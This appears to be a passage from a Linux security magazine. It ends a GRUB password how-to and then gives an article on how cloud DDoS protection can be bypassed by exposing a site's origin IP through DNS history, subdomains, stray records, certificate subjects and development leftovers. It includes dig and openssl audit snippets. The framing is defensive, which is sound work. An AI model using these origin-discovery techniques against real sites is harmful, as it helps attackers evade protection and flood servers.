Replace <password-hash> with the value returned by /sbin/grub-md5-crypt.
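Put together, the relevant part of /boot/grub/grub.conf might then look like the sketch below (the kernel title and version are illustrative, reusing the release seen earlier; <password-hash> is whatever /sbin/grub-md5-crypt printed):

```
default=0
timeout=5
password --md5 <password-hash>

title Red Hat Enterprise Linux
        root (hd0,0)
        kernel /vmlinuz-2.6.18-406.el5 ro root=/dev/VolGroup00/LogVol00
        initrd /initrd-2.6.18-406.el5.img
```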


The next time the system boots, the GRUB menu prevents access to the editor or command interface
without first pressing “p” followed by the GRUB password.

Author: Ragul Balakrishnan

Ragul Balakrishnan, a Red Hat Certified Architect. I have been working professionally
with Linux and Open Source for over 6 years. Working on Linux is my passion and I love
troubleshooting complex issues.

Weak points in MDDoS protection
by Tomasz Krupa

DDoS attacks have become increasingly powerful over the last few years.
Around one and a half years ago (early 2014), security holes in the Network Time
Protocol (NTP) were exploited to conduct amplification attacks of previously
unseen magnitude.

Mass Distributed Denial of Service has also become very popular, mostly due to
the ease of execution (read: it does not take much imagination), the availability of
tools (for a few dollars, tools such as booters or stressers can perform attacks), and,
finally, widespread botnet networks.

Weak points in Distributed Denial of Service cloud defence systems (aka looking for holes in
Cloud-based Security Providers' frameworks).

The Concept and main players
This article will touch on a few base points of Cloud architecture, and the mechanisms and concepts
used to mitigate such attacks. I will also try to highlight a few points where network admins can
strengthen their security and prevent some vital information from being leaked onto the Internet.
The concept behind securing against Mass DDoS in the Cloud is very simple: cloud providers, through
a chain of Content Delivery Networks and various endpoints, can disperse malicious traffic. This relies
solely on changing DNS settings and identifying malicious web traffic, which is then routed into
separate segments of the infrastructure, protecting companies' valuable assets.

A) Modus Operandi
The infrastructure designed by Cloud-based Security Providers acts as a set of reverse proxies for the
web servers that require protection from Mass DDoS or any malicious traffic. Those reverse proxies
inspect traffic for various clients simultaneously by routing it through their own distributed
infrastructure (often built on a powerful Public Cloud such as AWS or Azure).
This highly available Cloud-based infrastructure acts as a very powerful filter that can absorb huge
volumes of traffic. Integrated Web Application Firewalls can also inspect and filter malicious traffic at
the application layer and protect against SQL injection or XSS attacks.

B) DNS rerouting vs BGP rerouting

Several different strategies exist for the actual traffic redirection. I will describe the logic
behind the two most common approaches.
The first is DNS rerouting, which is integrated using an appliance deployed on the customer's
premises. The appliance captures all the traffic and, when an attack is detected, the DNS settings of
the customer's domain are redirected to an IP address belonging to the CBSP's scrubbing centre.
BGP rerouting is more complex and applies to an entire /24 IP block. Only if the entity managing the
website controls the entire block can it withdraw the BGP announcements for that IP range from its
own network. Consequently, all the traffic will start flowing through the CBSP's "Scrubbing
Centres" (see Figure 1).
Since BGP rerouting requires additional hardware and can be a bit challenging from an administrative
point of view, DNS rerouting, which uses a series of transparent DNS proxies, is the solution for the
masses and is the most widely adopted.

C) Content Distribution Networks and CBSPs

CDNs are the core of Cloud-based security against Mass DDoS. They are designed to cache static
content closer to the user's geographical location by using a series of edge locations conveniently
placed around the globe. This setup reduces the response time, load, and bandwidth of a website's
main server.
Further to that, a CDN has the ability to look inside the traffic and inspect headers, deciding whether
to present the requester with locally cached static files or to ask the server to generate content
dynamically.
A Content Delivery Network, together with a scrubbing centre and a Web Application Firewall, would
constitute an ideal defence against Mass Distributed Denial of Service... if only it were that easy.

The "origin exposure": the biggest hole in the Cloud-based Security
framework
The concept of cloud-based security relies on keeping the underlying web server (the origin) secret
and inaccessible to direct traffic. DNS rerouting is achieved by hiding the origin's IP address and
relying on redirection through the website's domain name; if attackers are able to discover the real IP
address of the origin, they can target the web server directly, going around the majority of the security
mechanisms and hitting it directly with high-volume traffic.
The risk of origin exposure has been classified as a security concern and raised in a few interesting
documents:
• D. McDonald, "The Pentesters Guide to Akamai". https://www.nccgroup.com/media/230388/the pentesters guide to akamai.pdf, 2013.
• A. Nixon and C. Camejo, "DDoS protection bypass techniques" @ Black Hat USA, 2013.

The topic has also received some attention from security companies:

• D. Lewis, "Bypassing Content Delivery Security". https://blogs.akamai.com/2013/08/bypassing-contentdelivery-security.html, 2013.
• N. Sullivan, "DDoS Prevention: Protecting The Origin". https://blog.cloudflare.com/ddos-preventionprotecting-the-origin/, 2013.
• R. Westervelt, "Cloud-Based DDoS Protection Is Easily Bypassed, Says Researcher". http://www.crn.com/news/security/240159295/cloudbased-ddos-protection-is-easily-bypassed-saysresearcher.htm, 2013.


A) IP History: an origin-exposing vector

If the origin is still assigned the same IP address as before the adoption of a CBSP, the server can be
exposed through historical knowledge of the domain and its corresponding IP address.
Several companies specialise in harvesting data about domain names by continually tracking their DNS
configuration, with the data mostly being used for marketing purposes.
Even domains that do not share their zone files and are not being indexed are not immune to this
exposing vector: if an attacker has been targeting a particular victim for a prolonged period of time,
he would gather enough information to trigger an attack against the origin's IP.
CBSPs therefore recommend that administrators assign a new IP address to their servers after
migrating DNS records to the CBSP.

B) Exposing the origin via subdomains in HTTP headers

Because CBSP logic is based on inspecting traffic as a reverse proxy, it relies on information
available in HTTP requests to distinguish between requests intended for different servers (clients). To
be precise, the mechanism detects the domain listed in the HTTP Host header; based on that, it can
correctly forward incoming traffic to the intended origin.
One of the side effects is that protocols which do not carry host information, such as FTP and SSH,
cannot be properly handled by the CBSPs' proxies and are thus, by default, broken.
To keep the FTP functionality, administrators can create a specific subdomain resolving directly to the
origin's IP address.
This provides a convenient tool for non-web protocols to bypass the CBSP and establish a direct
connection with the origin. This is not ideal: it creates yet another backdoor and enables an attacker
to perform a brute-force attack. For all administrators keen on keeping FTP exposed to the outside
world, there is a very good, well-explained article on stackexchange.com with a few interesting
steps: https://security.stackexchange.com/questions/23124/good-practices-to-secure-ftp-access

C) Temporary exposure of the domain origin via additional DNS records

It is very important to remember that once the DNS records have been taken over by the CBSP
provider, the original IP address may still be present in other DNS records, such as MX, CNAME, or
TXT. A patient attacker who spends a lot of time on reconnaissance will certainly be on the lookout
for those records (which might be exposed briefly during maintenance or while changing the CBSP
provider).
Administrators should be aware of this and, as described for the IP history leak, it is very important
to update the IP addresses of the web servers being migrated onto the Cloud CDNs.
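Auditing your own zone for such leftovers is straightforward; below is a hedged sketch using dig (the domain is a stand-in for the one being audited, and the helper name is made up):

```shell
# List records that may still point at the origin after a CBSP takeover.
enumerate_dns() {
    domain="$1"
    if ! command -v dig >/dev/null 2>&1; then
        echo "dig not installed; skipping enumeration"
        return 0
    fi
    for rrtype in A AAAA MX TXT NS; do
        echo "== $rrtype =="
        # short timeouts so the scan does not hang when offline
        dig +short +time=2 +tries=1 "$rrtype" "$domain" || true
    done
}

enumerate_dns example.com
```

Any record in the output that resolves to the old origin IP, typically an MX host living on the same box as the web server, is exactly the kind of leak described above.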

D) Why SSL certificates should be handled by CBSP and not exchanged very often
If administrators want to enable HTTPS for their website while under the protection of a CBSP, they can
let the CBSP set up a certificate for their domain. This enables the CBSP to take care of securing the
front-end connection between their own cloud infrastructure and a visitor. Alternatively, the
administrator can hand over the private key of their origin’s certificate to the CBSP. In this case, the
CBSP can set up the front-end SSL connection with the website’s own certificate. In order to secure
the back-end connection between the CBSP and the origin, the origin must present a certificate.
However, this certificate lists the domain name as the subject, and therefore identifies itself as the
origin.
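The disclosure is easy to see for yourself. The sketch below mints a throwaway self-signed certificate for a hypothetical protected domain and then reads its subject field, exactly as a scanner probing a candidate origin IP would after completing a TLS handshake:

```shell
# Show how a back-end certificate names the domain it protects.
tmpdir=$(mktemp -d)

# Throwaway self-signed cert for a made-up domain (no real site involved).
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
    -keyout "$tmpdir/origin.key" -out "$tmpdir/origin.crt" \
    -subj "/CN=www.protected-site.example" 2>/dev/null

# Anyone who completes a TLS handshake with the origin sees this field:
subject=$(openssl x509 -noout -subject -in "$tmpdir/origin.crt")
echo "$subject"

rm -rf "$tmpdir"
```

This is why letting the CBSP terminate TLS on a certificate of its own, while the back-end connection uses a certificate that does not name the protected domain, reduces the exposure.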

E) Sensitive files: why any development leftovers should be deleted

Any files that were created during the development or configuration phase can be used to expose
a server's origin, especially when they show detailed information. Furthermore, verbose error pages
and log files can also disclose the origin. It is very important for these types of files to be removed
once a website goes into production.

It doesn't look very promising, so what's the alternative?

Even though origin-exposing attacks affect a large portion of Cloud-based Security providers, and are
difficult to completely seal off, I can see that there is a growing market for the security-oriented
Cloud.
Only the Public Cloud can stand against mass attacks of very high magnitude while still operating a
normal service for its customers. Thanks to this design and scalability, attacks using the exposed
origin will, in my opinion, slowly decline, especially as more administrators become aware of the logic
behind the attack vectors.
This part only touches on origin-exposing attacks, which are far more elaborate and time-consuming.
In the next part, I will try to explain, with a few examples, how to tell whether a captured origin is
actually genuine and what can be just random noise created by a dynamically generated website.
Thank you very much for your time. I hope you enjoyed reading this short piece and that I have
inspired some of you to do further research.

Note: I can assure you that no innocent domains were harmed in the preparation of this article.
No DNS record has been violated, nor any origin IP exposed. I based all the research on publicly
available tools.

Author: Tomasz Krupa

Security Researcher, Linux Debian and London Arsenal big fan, AWS Infrastructure Engineer.
LPIC-1 Certified, currently studying for AWS Solutions Architect.
